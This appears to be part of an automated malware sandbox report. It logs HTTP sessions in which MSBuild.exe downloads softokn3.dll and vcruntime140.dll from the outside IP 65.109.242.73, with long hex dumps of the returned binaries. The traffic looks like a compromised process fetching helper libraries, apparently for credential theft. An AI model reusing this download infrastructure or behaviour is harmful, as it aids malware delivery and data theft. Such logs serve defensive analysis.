                                                                                                                                                                                                                                            2024-04-18 08:10:40 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                            Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                            2024-04-18 08:10:40 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                            Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                            2024-04-18 08:10:40 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                                                            Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                            2024-04-18 08:10:40 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                            Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                            2024-04-18 08:10:40 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                            Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                                                            2024-04-18 08:10:40 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                            Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            15192.168.2.44975265.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:41 UTC158OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:42 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:42 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-04-18 08:10:42 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                            2024-04-18 08:10:42 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                            Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                            2024-04-18 08:10:42 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                            Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                            2024-04-18 08:10:42 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                                                            Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                            2024-04-18 08:10:42 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                            Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                            2024-04-18 08:10:43 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                            Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                            2024-04-18 08:10:43 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                            Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                            2024-04-18 08:10:43 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                            Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                            2024-04-18 08:10:43 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                            Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                            2024-04-18 08:10:43 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                            Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            16192.168.2.44975365.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:43 UTC162OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:44 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:44 GMT
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-04-18 08:10:44 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                            2024-04-18 08:10:44 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                                                            Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                                                            2024-04-18 08:10:44 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                                                            Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
